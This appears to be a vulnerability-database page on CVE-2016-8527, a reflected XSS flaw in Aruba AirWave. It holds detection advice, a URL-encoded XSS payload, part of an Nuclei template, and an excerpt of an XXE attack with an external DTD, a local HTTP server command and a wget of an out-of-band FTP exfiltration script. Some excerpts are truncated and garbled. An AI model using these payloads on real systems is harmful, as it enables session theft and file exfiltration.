CVE-2016-8527
published 2018-08-06CVE-2016-8527: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). The vulnerability is present in the…
PriorityP343medium6.1CVSS 3.0
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
13.16%
95.9th percentile
Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). The vulnerability is present in the VisualRF component of AirWave. By exploiting this vulnerability, an attacker who can trick a logged-in AirWave administrative user into clicking a link could obtain sensitive information, such as session cookies or passwords. The vulnerability requires that an administrative users click on the malicious link while currently logged into AirWave in the same browser.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hewlett_packard_enterprise | aruba_airwave | — | — |
| hp | airwave | < 8.2.3.1 | 8.2.3.1 |
Detection & IOCsextracted from sources · hover to see the quote
url/visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(/XSS/)'%2f%3e%3c%2fa%3e&end=500&match↗
yara
alert(document.domain)
- →CVE-2016-8527 XSS is triggered via HTTP GET parameters 'start' or 'end' on the /visualrf/group_list.xml endpoint. Monitor for URL-encoded HTML/script injection in these parameters. ↗
- →The reflected XSS payload uses an XML namespace trick: a URL-encoded <a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'/></a> injected into the 'start' parameter. Detect URL-encoded xhtml namespace strings in GET requests to /visualrf/group_list.xml. ↗
- →Session cookies or passwords may be exfiltrated via the reflected XSS. Monitor for outbound requests from AirWave admin browser sessions to unexpected external hosts shortly after access to /visualrf/group_list.xml. ↗
- →The Nuclei probe for this CVE checks for alert(document.domain) in the response body and Content-Type: text/html with HTTP 200. Use these as detection criteria in web application firewall or IDS rules.
- ·All Aruba AirWave versions up to but not including 8.2.3.1 are affected. Versions 8.2.3 and below were confirmed vulnerable at time of discovery. ↗
CVSS provenance
nvdv3.06.1MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting
exploitdb·2017-03-01·CVSS 8.8
CVE-2016-8527 [HIGH] Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting
Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting
---
SEC Consult Vulnerability Lab Security Advisory
title: XML External Entity Injection (XXE),
Reflected Cross Site Scripting
product: Aruba AirWave
vulnerable version: Floor Plans > Select 'View' under 'Network' section.
Select a campus (e.g. Default Campus) > Select 'Edit' >
Select action 'Export Floor Plans' > Ok
POST /visualrf/backup_sites HTTP/1.1
Host:
[...]
xml=:1234/sectest.dtd">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]>%26%65%78%66%69%6c%3b
$ cat sectest.dtd
">
:2121/%data;'>">
$ python -m SimpleHTTPServer 1234
$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
230 more data please!
230 more data please!
230 more data
Nuclei
Aruba Airwave <8.2.3.1 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2016-8527 [MEDIUM] Aruba Airwave <8.2.3.1 - Cross-Site Scripting
Aruba Airwave alert(document.domain)"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502204c3c934106736b3d6109aa029f8e8146defd0c558ef0aa5af18af0053adf3f35022100e4072263462f7e4db47b5b4728d60bfbe4ab98a0e9628f36de074b6fb93aeec7:922c64590222798bb761d5b6d8e72950
2018-08-06
Published